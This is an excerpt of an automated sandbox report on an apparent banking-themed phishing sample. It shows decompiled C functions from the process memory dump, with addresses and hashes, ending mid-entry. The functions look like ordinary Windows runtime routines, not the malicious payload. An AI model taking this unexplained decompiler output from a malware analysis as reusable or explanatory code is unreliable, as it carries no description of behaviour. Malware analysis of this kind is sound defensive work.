                                                                    • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                    • Instruction Fuzzy Hash: 7311C272904208BBC7059F5C98808BEB7B9EF99314F10806AF944CB351DA319E55D7A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 87%
                                                                    			E018D37F5(void* __ecx, intOrPtr* __edx) {
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				signed char _t6;
                                                                    				intOrPtr _t13;
                                                                    				intOrPtr* _t20;
                                                                    				intOrPtr* _t27;
                                                                    				void* _t28;
                                                                    				intOrPtr* _t29;
                                                                    
                                                                    				_t27 = __edx;
                                                                    				_t28 = __ecx;
                                                                    				if(__edx == 0) {
                                                                    					E018B2280(_t6, 0x1988550);
                                                                    				}
                                                                    				_t29 = E018D387E(_t28);
                                                                    				if(_t29 == 0) {
                                                                    					L6:
                                                                    					if(_t27 == 0) {
                                                                    						E018AFFB0(0x1988550, _t27, 0x1988550);
                                                                    					}
                                                                    					if(_t29 == 0) {
                                                                    						return 0xc0000225;
                                                                    					} else {
                                                                    						if(_t27 != 0) {
                                                                    							goto L14;
                                                                    						}
                                                                    						L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                                                                    						goto L11;
                                                                    					}
                                                                    				} else {
                                                                    					_t13 =  *_t29;
                                                                    					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                                                                    						L13:
                                                                    						_push(3);
                                                                    						asm("int 0x29");
                                                                    						L14:
                                                                    						 *_t27 = _t29;
                                                                    						L11:
                                                                    						return 0;
                                                                    					}
                                                                    					_t20 =  *((intOrPtr*)(_t29 + 4));
                                                                    					if( *_t20 != _t29) {
                                                                    						goto L13;
                                                                    					}
                                                                    					 *_t20 = _t13;
                                                                    					 *((intOrPtr*)(_t13 + 4)) = _t20;
                                                                    					asm("btr eax, ecx");
                                                                    					goto L6;
                                                                    				}
                                                                    			}











                                                                    0x018d37fa
                                                                    0x018d37fc
                                                                    0x018d3805
                                                                    0x018d3808
                                                                    0x018d3808
                                                                    0x018d3814
                                                                    0x018d3818
                                                                    0x018d3846
                                                                    0x018d3848
                                                                    0x018d384b
                                                                    0x018d384b
                                                                    0x018d3852
                                                                    0x00000000
                                                                    0x018d3854
                                                                    0x018d3856
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018d3863
                                                                    0x00000000
                                                                    0x018d3863
                                                                    0x018d381a
                                                                    0x018d381a
                                                                    0x018d381f
                                                                    0x018d386e
                                                                    0x018d386e
                                                                    0x018d3871
                                                                    0x018d3873
                                                                    0x018d3873
                                                                    0x018d3868
                                                                    0x00000000
                                                                    0x018d3868
                                                                    0x018d3821
                                                                    0x018d3826
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018d3828
                                                                    0x018d382a
                                                                    0x018d3841
                                                                    0x00000000
                                                                    0x018d3841

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 816e663ba57c6c4247387e0575d3e213845e74beb159261a854ddb34a9c6b0e3
                                                                    • Instruction ID: 04374b02fcb65f9e44cc152b8ec4115215d3321e8339fe4ea4ebe9ccadfd5717
                                                                    • Opcode Fuzzy Hash: 816e663ba57c6c4247387e0575d3e213845e74beb159261a854ddb34a9c6b0e3
                                                                    • Instruction Fuzzy Hash: BC01D6F29017119BC3378B1D9941E2ABBA6FF85B60B154069ED59CB315DB30DB01C7D2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E018C002D() {
                                                                    				void* _t11;
                                                                    				char* _t14;
                                                                    				signed char* _t16;
                                                                    				char* _t27;
                                                                    				signed char* _t29;
                                                                    
                                                                    				_t11 = E018B7D50();
                                                                    				_t27 = 0x7ffe0384;
                                                                    				if(_t11 != 0) {
                                                                    					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                    				} else {
                                                                    					_t14 = 0x7ffe0384;
                                                                    				}
                                                                    				_t29 = 0x7ffe0385;
                                                                    				if( *_t14 != 0) {
                                                                    					if(E018B7D50() == 0) {
                                                                    						_t16 = 0x7ffe0385;
                                                                    					} else {
                                                                    						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                    					}
                                                                    					if(( *_t16 & 0x00000040) != 0) {
                                                                    						goto L18;
                                                                    					} else {
                                                                    						goto L3;
                                                                    					}
                                                                    				} else {
                                                                    					L3:
                                                                    					if(E018B7D50() != 0) {
                                                                    						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                    					}
                                                                    					if( *_t27 != 0) {
                                                                    						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                                                                    							goto L5;
                                                                    						}
                                                                    						if(E018B7D50() != 0) {
                                                                    							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                    						}
                                                                    						if(( *_t29 & 0x00000020) == 0) {
                                                                    							goto L5;
                                                                    						}
                                                                    						L18:
                                                                    						return 1;
                                                                    					} else {
                                                                    						L5:
                                                                    						return 0;
                                                                    					}
                                                                    				}
                                                                    			}








                                                                    0x018c0032
                                                                    0x018c0037
                                                                    0x018c0043
                                                                    0x01904b3a
                                                                    0x018c0049
                                                                    0x018c0049
                                                                    0x018c0049
                                                                    0x018c004e
                                                                    0x018c0053
                                                                    0x01904b48
                                                                    0x01904b5a
                                                                    0x01904b4a
                                                                    0x01904b53
                                                                    0x01904b53
                                                                    0x01904b5f
                                                                    0x00000000
                                                                    0x01904b61
                                                                    0x00000000
                                                                    0x01904b61
                                                                    0x018c0059
                                                                    0x018c0059
                                                                    0x018c0060
                                                                    0x01904b6f
                                                                    0x01904b6f
                                                                    0x018c0069
                                                                    0x01904b83
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01904b90
                                                                    0x01904b9b
                                                                    0x01904b9b
                                                                    0x01904ba4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01904baa
                                                                    0x00000000
                                                                    0x018c006f
                                                                    0x018c006f
                                                                    0x00000000
                                                                    0x018c006f
                                                                    0x018c0069

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                    • Instruction ID: efa2efb7a04f8b0039b9e39a2dadbed4256e99433bf7d3e64405221629ee5569
                                                                    • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                    • Instruction Fuzzy Hash: F311A536606AC1CFE723976CC544B797B98AF41B95F0A00A4EE08CB7D3D738D941C655
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 94%
                                                                    			E018A766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                                    				char _v8;
                                                                    				void* _t22;
                                                                    				void* _t24;
                                                                    				intOrPtr _t29;
                                                                    				intOrPtr* _t30;
                                                                    				void* _t42;
                                                                    				intOrPtr _t47;
                                                                    
                                                                    				_push(__ecx);
                                                                    				_t36 =  &_v8;
                                                                    				if(E018CF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                                                                    					L10:
                                                                    					_t22 = 0;
                                                                    				} else {
                                                                    					_t24 = _v8 + __ecx;
                                                                    					_t42 = _t24;
                                                                    					if(_t24 < __ecx) {
                                                                    						goto L10;
                                                                    					} else {
                                                                    						if(E018CF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                                                                    							goto L10;
                                                                    						} else {
                                                                    							_t29 = _v8 + _t42;
                                                                    							if(_t29 < _t42) {
                                                                    								goto L10;
                                                                    							} else {
                                                                    								_t47 = _t29;
                                                                    								_t30 = _a16;
                                                                    								if(_t30 != 0) {
                                                                    									 *_t30 = _t47;
                                                                    								}
                                                                    								if(_t47 == 0) {
                                                                    									goto L10;
                                                                    								} else {
                                                                    									_t22 = L018B4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return _t22;
                                                                    			}










                                                                    0x018a7672
                                                                    0x018a767f
                                                                    0x018a7689
                                                                    0x018a76de
                                                                    0x018a76de
                                                                    0x018a768b
                                                                    0x018a7691
                                                                    0x018a7693
                                                                    0x018a7697
                                                                    0x00000000
                                                                    0x018a7699
                                                                    0x018a76a8
                                                                    0x00000000
                                                                    0x018a76aa
                                                                    0x018a76ad
                                                                    0x018a76b1
                                                                    0x00000000
                                                                    0x018a76b3
                                                                    0x018a76b3
                                                                    0x018a76b5
                                                                    0x018a76ba
                                                                    0x018a76bc
                                                                    0x018a76bc
                                                                    0x018a76c0
                                                                    0x00000000
                                                                    0x018a76c2
                                                                    0x018a76ce
                                                                    0x018a76ce
                                                                    0x018a76c0
                                                                    0x018a76b1
                                                                    0x018a76a8
                                                                    0x018a7697
                                                                    0x018a76d9

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                    • Instruction ID: 4740c45b02cc307416d2f630b6fb39dcfade1ec5d6599767dee8dcc71c96990b
                                                                    • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                    • Instruction Fuzzy Hash: B7018432710519ABE7209E6ECC41F5B7BADEB84B60F680534BA09CB251DA31DE01A7A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 69%
                                                                    			E01899080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                                    				intOrPtr* _t51;
                                                                    				intOrPtr _t59;
                                                                    				signed int _t64;
                                                                    				signed int _t67;
                                                                    				signed int* _t71;
                                                                    				signed int _t74;
                                                                    				signed int _t77;
                                                                    				signed int _t82;
                                                                    				intOrPtr* _t84;
                                                                    				void* _t85;
                                                                    				intOrPtr* _t87;
                                                                    				void* _t94;
                                                                    				signed int _t95;
                                                                    				intOrPtr* _t97;
                                                                    				signed int _t99;
                                                                    				signed int _t102;
                                                                    				void* _t104;
                                                                    
                                                                    				_push(__ebx);
                                                                    				_push(__esi);
                                                                    				_push(__edi);
                                                                    				_t97 = __ecx;
                                                                    				_t102 =  *(__ecx + 0x14);
                                                                    				if((_t102 & 0x02ffffff) == 0x2000000) {
                                                                    					_t102 = _t102 | 0x000007d0;
                                                                    				}
                                                                    				_t48 =  *[fs:0x30];
                                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                                    					_t102 = _t102 & 0xff000000;
                                                                    				}
                                                                    				_t80 = 0x19885ec;
                                                                    				E018B2280(_t48, 0x19885ec);
                                                                    				_t51 =  *_t97 + 8;
                                                                    				if( *_t51 != 0) {
                                                                    					L6:
                                                                    					return E018AFFB0(_t80, _t97, _t80);
                                                                    				} else {
                                                                    					 *(_t97 + 0x14) = _t102;
                                                                    					_t84 =  *0x198538c; // 0x77de6828
                                                                    					if( *_t84 != 0x1985388) {
                                                                    						_t85 = 3;
                                                                    						asm("int 0x29");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						_push(0x2c);
                                                                    						_push(0x196f6e8);
                                                                    						E018ED0E8(0x19885ec, _t97, _t102);
                                                                    						 *((char*)(_t104 - 0x1d)) = 0;
                                                                    						_t99 =  *(_t104 + 8);
                                                                    						__eflags = _t99;
                                                                    						if(_t99 == 0) {
                                                                    							L13:
                                                                    							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                    							if(__eflags == 0) {
                                                                    								E019688F5(_t80, _t85, 0x1985388, _t99, _t102, __eflags);
                                                                    							}
                                                                    						} else {
                                                                    							__eflags = _t99 -  *0x19886c0; // 0x14407b0
                                                                    							if(__eflags == 0) {
                                                                    								goto L13;
                                                                    							} else {
                                                                    								__eflags = _t99 -  *0x19886b8; // 0x0
                                                                    								if(__eflags == 0) {
                                                                    									goto L13;
                                                                    								} else {
                                                                    									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                                                    									__eflags =  *((char*)(_t59 + 0x28));
                                                                    									if( *((char*)(_t59 + 0x28)) == 0) {
                                                                    										E018B2280(_t99 + 0xe0, _t99 + 0xe0);
                                                                    										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                                                    										__eflags =  *((char*)(_t99 + 0xe5));
                                                                    										if(__eflags != 0) {
                                                                    											E019688F5(0x19885ec, _t85, 0x1985388, _t99, _t102, __eflags);
                                                                    										} else {
                                                                    											__eflags =  *((char*)(_t99 + 0xe4));
                                                                    											if( *((char*)(_t99 + 0xe4)) == 0) {
                                                                    												 *((char*)(_t99 + 0xe4)) = 1;
                                                                    												_push(_t99);
                                                                    												_push( *((intOrPtr*)(_t99 + 0x24)));
                                                                    												E018DAFD0();
                                                                    											}
                                                                    											while(1) {
                                                                    												_t71 = _t99 + 8;
                                                                    												 *(_t104 - 0x2c) = _t71;
                                                                    												_t80 =  *_t71;
                                                                    												_t95 = _t71[1];
                                                                    												 *(_t104 - 0x28) = _t80;
                                                                    												 *(_t104 - 0x24) = _t95;
                                                                    												while(1) {
                                                                    													L19:
                                                                    													__eflags = _t95;
                                                                    													if(_t95 == 0) {
                                                                    														break;
                                                                    													}
                                                                    													_t102 = _t80;
                                                                    													 *(_t104 - 0x30) = _t95;
                                                                    													 *(_t104 - 0x24) = _t95 - 1;
                                                                    													asm("lock cmpxchg8b [edi]");
                                                                    													_t80 = _t102;
                                                                    													 *(_t104 - 0x28) = _t80;
                                                                    													 *(_t104 - 0x24) = _t95;
                                                                    													__eflags = _t80 - _t102;
                                                                    													_t99 =  *(_t104 + 8);
                                                                    													if(_t80 != _t102) {
                                                                    														continue;
                                                                    													} else {
                                                                    														__eflags = _t95 -  *(_t104 - 0x30);
                                                                    														if(_t95 !=  *(_t104 - 0x30)) {
                                                                    															continue;
                                                                    														} else {
                                                                    															__eflags = _t95;
                                                                    															if(_t95 != 0) {
                                                                    																_t74 = 0;
                                                                    																 *(_t104 - 0x34) = 0;
                                                                    																_t102 = 0;
                                                                    																__eflags = 0;
                                                                    																while(1) {
                                                                    																	 *(_t104 - 0x3c) = _t102;
                                                                    																	__eflags = _t102 - 3;
                                                                    																	if(_t102 >= 3) {
                                                                    																		break;
                                                                    																	}
                                                                    																	__eflags = _t74;
                                                                    																	if(_t74 != 0) {
                                                                    																		L49:
                                                                    																		_t102 =  *_t74;
                                                                    																		__eflags = _t102;
                                                                    																		if(_t102 != 0) {
                                                                    																			_t102 =  *(_t102 + 4);
                                                                    																			__eflags = _t102;
                                                                    																			if(_t102 != 0) {
                                                                    																				 *0x198b1e0(_t74, _t99);
                                                                    																				 *_t102();
                                                                    																			}
                                                                    																		}
                                                                    																		do {
                                                                    																			_t71 = _t99 + 8;
                                                                    																			 *(_t104 - 0x2c) = _t71;
                                                                    																			_t80 =  *_t71;
                                                                    																			_t95 = _t71[1];
                                                                    																			 *(_t104 - 0x28) = _t80;
                                                                    																			 *(_t104 - 0x24) = _t95;
                                                                    																			goto L19;
                                                                    																		} while (_t74 == 0);
                                                                    																		goto L49;
                                                                    																	} else {
                                                                    																		_t82 = 0;
                                                                    																		__eflags = 0;
                                                                    																		while(1) {
                                                                    																			 *(_t104 - 0x38) = _t82;
                                                                    																			__eflags = _t82 -  *0x19884c0;
                                                                    																			if(_t82 >=  *0x19884c0) {
                                                                    																				break;
                                                                    																			}
                                                                    																			__eflags = _t74;
                                                                    																			if(_t74 == 0) {
                                                                    																				_t77 = E01969063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                                                    																				__eflags = _t77;
                                                                    																				if(_t77 == 0) {
                                                                    																					_t74 = 0;
                                                                    																					__eflags = 0;
                                                                    																				} else {
                                                                    																					_t74 = _t77 + 0xfffffff4;
                                                                    																				}
                                                                    																				 *(_t104 - 0x34) = _t74;
                                                                    																				_t82 = _t82 + 1;
                                                                    																				continue;
                                                                    																			}
                                                                    																			break;
                                                                    																		}
                                                                    																		_t102 = _t102 + 1;
                                                                    																		continue;
                                                                    																	}
                                                                    																	goto L20;
                                                                    																}
                                                                    																__eflags = _t74;
                                                                    															}
                                                                    														}
                                                                    													}
                                                                    													break;
                                                                    												}
                                                                    												L20:
                                                                    												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                                                    												 *((char*)(_t99 + 0xe5)) = 1;
                                                                    												 *((char*)(_t104 - 0x1d)) = 1;
                                                                    												goto L21;
                                                                    											}
                                                                    										}
                                                                    										L21:
                                                                    										 *(_t104 - 4) = 0xfffffffe;
                                                                    										E0189922A(_t99);
                                                                    										_t64 = E018B7D50();
                                                                    										__eflags = _t64;
                                                                    										if(_t64 != 0) {
                                                                    											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                    										} else {
                                                                    											_t67 = 0x7ffe0386;
                                                                    										}
                                                                    										__eflags =  *_t67;
                                                                    										if( *_t67 != 0) {
                                                                    											_t67 = E01968B58(_t99);
                                                                    										}
                                                                    										__eflags =  *((char*)(_t104 - 0x1d));
                                                                    										if( *((char*)(_t104 - 0x1d)) != 0) {
                                                                    											__eflags = _t99 -  *0x19886c0; // 0x14407b0
                                                                    											if(__eflags != 0) {
                                                                    												__eflags = _t99 -  *0x19886b8; // 0x0
                                                                    												if(__eflags == 0) {
                                                                    													_t94 = 0x19886bc;
                                                                    													_t87 = 0x19886b8;
                                                                    													goto L27;
                                                                    												} else {
                                                                    													__eflags = _t67 | 0xffffffff;
                                                                    													asm("lock xadd [edi], eax");
                                                                    													if(__eflags == 0) {
                                                                    														E01899240(_t80, _t99, _t99, _t102, __eflags);
                                                                    													}
                                                                    												}
                                                                    											} else {
                                                                    												_t94 = 0x19886c4;
                                                                    												_t87 = 0x19886c0;
                                                                    												L27:
                                                                    												E018C9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                                                    											}
                                                                    										}
                                                                    									} else {
                                                                    										goto L13;
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						return E018ED130(_t80, _t99, _t102);
                                                                    					} else {
                                                                    						 *_t51 = 0x1985388;
                                                                    						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                                                    						 *_t84 = _t51;
                                                                    						 *0x198538c = _t51;
                                                                    						goto L6;
                                                                    					}
                                                                    				}
                                                                    			}




















                                                                    0x01899082
                                                                    0x01899083
                                                                    0x01899084
                                                                    0x01899085
                                                                    0x01899087
                                                                    0x01899096
                                                                    0x01899098
                                                                    0x01899098
                                                                    0x0189909e
                                                                    0x018990a8
                                                                    0x018990e7
                                                                    0x018990e7
                                                                    0x018990aa
                                                                    0x018990b0
                                                                    0x018990b7
                                                                    0x018990bd
                                                                    0x018990dd
                                                                    0x018990e6
                                                                    0x018990bf
                                                                    0x018990bf
                                                                    0x018990c7
                                                                    0x018990cf
                                                                    0x018990f1
                                                                    0x018990f2
                                                                    0x018990f4
                                                                    0x018990f5
                                                                    0x018990f6
                                                                    0x018990f7
                                                                    0x018990f8
                                                                    0x018990f9
                                                                    0x018990fa
                                                                    0x018990fb
                                                                    0x018990fc
                                                                    0x018990fd
                                                                    0x018990fe
                                                                    0x018990ff
                                                                    0x01899100
                                                                    0x01899102
                                                                    0x01899107
                                                                    0x0189910c
                                                                    0x01899110
                                                                    0x01899113
                                                                    0x01899115
                                                                    0x01899136
                                                                    0x0189913f
                                                                    0x01899143
                                                                    0x018f37e4
                                                                    0x018f37e4
                                                                    0x01899117
                                                                    0x01899117
                                                                    0x0189911d
                                                                    0x00000000
                                                                    0x0189911f
                                                                    0x0189911f
                                                                    0x01899125
                                                                    0x00000000
                                                                    0x01899127
                                                                    0x0189912d
                                                                    0x01899130
                                                                    0x01899134
                                                                    0x01899158
                                                                    0x0189915d
                                                                    0x01899161
                                                                    0x01899168
                                                                    0x018f3715
                                                                    0x0189916e
                                                                    0x0189916e
                                                                    0x01899175
                                                                    0x01899177
                                                                    0x0189917e
                                                                    0x0189917f
                                                                    0x01899182
                                                                    0x01899182
                                                                    0x01899187
                                                                    0x01899187
                                                                    0x0189918a
                                                                    0x0189918d
                                                                    0x0189918f
                                                                    0x01899192
                                                                    0x01899195
                                                                    0x01899198
                                                                    0x01899198
                                                                    0x01899198
                                                                    0x0189919a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f371f
                                                                    0x018f3721
                                                                    0x018f3727
                                                                    0x018f372f
                                                                    0x018f3733
                                                                    0x018f3735
                                                                    0x018f3738
                                                                    0x018f373b
                                                                    0x018f373d
                                                                    0x018f3740
                                                                    0x00000000
                                                                    0x018f3746
                                                                    0x018f3746
                                                                    0x018f3749
                                                                    0x00000000
                                                                    0x018f374f
                                                                    0x018f374f
                                                                    0x018f3751
                                                                    0x018f3757
                                                                    0x018f3759
                                                                    0x018f375c
                                                                    0x018f375c
                                                                    0x018f375e
                                                                    0x018f375e
                                                                    0x018f3761
                                                                    0x018f3764
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f3766
                                                                    0x018f3768
                                                                    0x018f37a3
                                                                    0x018f37a3
                                                                    0x018f37a5
                                                                    0x018f37a7
                                                                    0x018f37ad
                                                                    0x018f37b0
                                                                    0x018f37b2
                                                                    0x018f37bc
                                                                    0x018f37c2
                                                                    0x018f37c2
                                                                    0x018f37b2
                                                                    0x01899187
                                                                    0x01899187
                                                                    0x0189918a
                                                                    0x0189918d
                                                                    0x0189918f
                                                                    0x01899192
                                                                    0x01899195
                                                                    0x00000000
                                                                    0x01899195
                                                                    0x00000000
                                                                    0x018f376a
                                                                    0x018f376a
                                                                    0x018f376a
                                                                    0x018f376c
                                                                    0x018f376c
                                                                    0x018f376f
                                                                    0x018f3775
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f3777
                                                                    0x018f3779
                                                                    0x018f3782
                                                                    0x018f3787
                                                                    0x018f3789
                                                                    0x018f3790
                                                                    0x018f3790
                                                                    0x018f378b
                                                                    0x018f378b
                                                                    0x018f378b
                                                                    0x018f3792
                                                                    0x018f3795
                                                                    0x00000000
                                                                    0x018f3795
                                                                    0x00000000
                                                                    0x018f3779
                                                                    0x018f3798
                                                                    0x00000000
                                                                    0x018f3798
                                                                    0x00000000
                                                                    0x018f3768
                                                                    0x018f379b
                                                                    0x018f379b
                                                                    0x018f3751
                                                                    0x018f3749
                                                                    0x00000000
                                                                    0x018f3740
                                                                    0x018991a0
                                                                    0x018991a3
                                                                    0x018991a9
                                                                    0x018991b0
                                                                    0x00000000
                                                                    0x018991b0
                                                                    0x01899187
                                                                    0x018991b4
                                                                    0x018991b4
                                                                    0x018991bb
                                                                    0x018991c0
                                                                    0x018991c5
                                                                    0x018991c7
                                                                    0x018f37da
                                                                    0x018991cd
                                                                    0x018991cd
                                                                    0x018991cd
                                                                    0x018991d2
                                                                    0x018991d5
                                                                    0x01899239
                                                                    0x01899239
                                                                    0x018991d7
                                                                    0x018991db
                                                                    0x018991e1
                                                                    0x018991e7
                                                                    0x018991fd
                                                                    0x01899203
                                                                    0x0189921e
                                                                    0x01899223
                                                                    0x00000000
                                                                    0x01899205
                                                                    0x01899205
                                                                    0x01899208
                                                                    0x0189920c
                                                                    0x01899214
                                                                    0x01899214
                                                                    0x0189920c
                                                                    0x018991e9
                                                                    0x018991e9
                                                                    0x018991ee
                                                                    0x018991f3
                                                                    0x018991f3
                                                                    0x018991f3
                                                                    0x018991e7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01899134
                                                                    0x01899125
                                                                    0x0189911d
                                                                    0x0189914e
                                                                    0x018990d1
                                                                    0x018990d1
                                                                    0x018990d3
                                                                    0x018990d6
                                                                    0x018990d8
                                                                    0x00000000
                                                                    0x018990d8
                                                                    0x018990cf

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 06e3183aa7eec1520ec74882dde7246950dc89d69124286709a1a23edee6922a
                                                                    • Instruction ID: 1c565a0a97115086480eb5c3a06a36d50a6a3d67999ea12a44dda7b3d3eb8286
                                                                    • Opcode Fuzzy Hash: 06e3183aa7eec1520ec74882dde7246950dc89d69124286709a1a23edee6922a
                                                                    • Instruction Fuzzy Hash: 0F018172905604CFD7259F1CD840B15BBA9EB45328F2A406AE515CB692C674DD41CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 46%
                                                                    			E0192C450(intOrPtr* _a4) {
                                                                    				signed char _t25;
                                                                    				intOrPtr* _t26;
                                                                    				intOrPtr* _t27;
                                                                    
                                                                    				_t26 = _a4;
                                                                    				_t25 =  *(_t26 + 0x10);
                                                                    				if((_t25 & 0x00000003) != 1) {
                                                                    					_push(0);
                                                                    					_push(0);
                                                                    					_push(0);
                                                                    					_push( *((intOrPtr*)(_t26 + 8)));
                                                                    					_push(0);
                                                                    					_push( *_t26);
                                                                    					E018D9910();
                                                                    					_t25 =  *(_t26 + 0x10);
                                                                    				}
                                                                    				if((_t25 & 0x00000001) != 0) {
                                                                    					_push(4);
                                                                    					_t7 = _t26 + 4; // 0x4
                                                                    					_t27 = _t7;
                                                                    					_push(_t27);
                                                                    					_push(5);
                                                                    					_push(0xfffffffe);
                                                                    					E018D95B0();
                                                                    					if( *_t27 != 0) {
                                                                    						_push( *_t27);
                                                                    						E018D95D0();
                                                                    					}
                                                                    				}
                                                                    				_t8 = _t26 + 0x14; // 0x14
                                                                    				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                                                                    					L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                                                                    				}
                                                                    				_push( *_t26);
                                                                    				E018D95D0();
                                                                    				return L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                                                                    			}






                                                                    0x0192c458
                                                                    0x0192c45d
                                                                    0x0192c466
                                                                    0x0192c468
                                                                    0x0192c469
                                                                    0x0192c46a
                                                                    0x0192c46b
                                                                    0x0192c46e
                                                                    0x0192c46f
                                                                    0x0192c471
                                                                    0x0192c476
                                                                    0x0192c476
                                                                    0x0192c47c
                                                                    0x0192c47e
                                                                    0x0192c480
                                                                    0x0192c480
                                                                    0x0192c483
                                                                    0x0192c484
                                                                    0x0192c486
                                                                    0x0192c488
                                                                    0x0192c48f
                                                                    0x0192c491
                                                                    0x0192c493
                                                                    0x0192c493
                                                                    0x0192c48f
                                                                    0x0192c498
                                                                    0x0192c49e
                                                                    0x0192c4ad
                                                                    0x0192c4ad
                                                                    0x0192c4b2
                                                                    0x0192c4b4
                                                                    0x0192c4cd

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
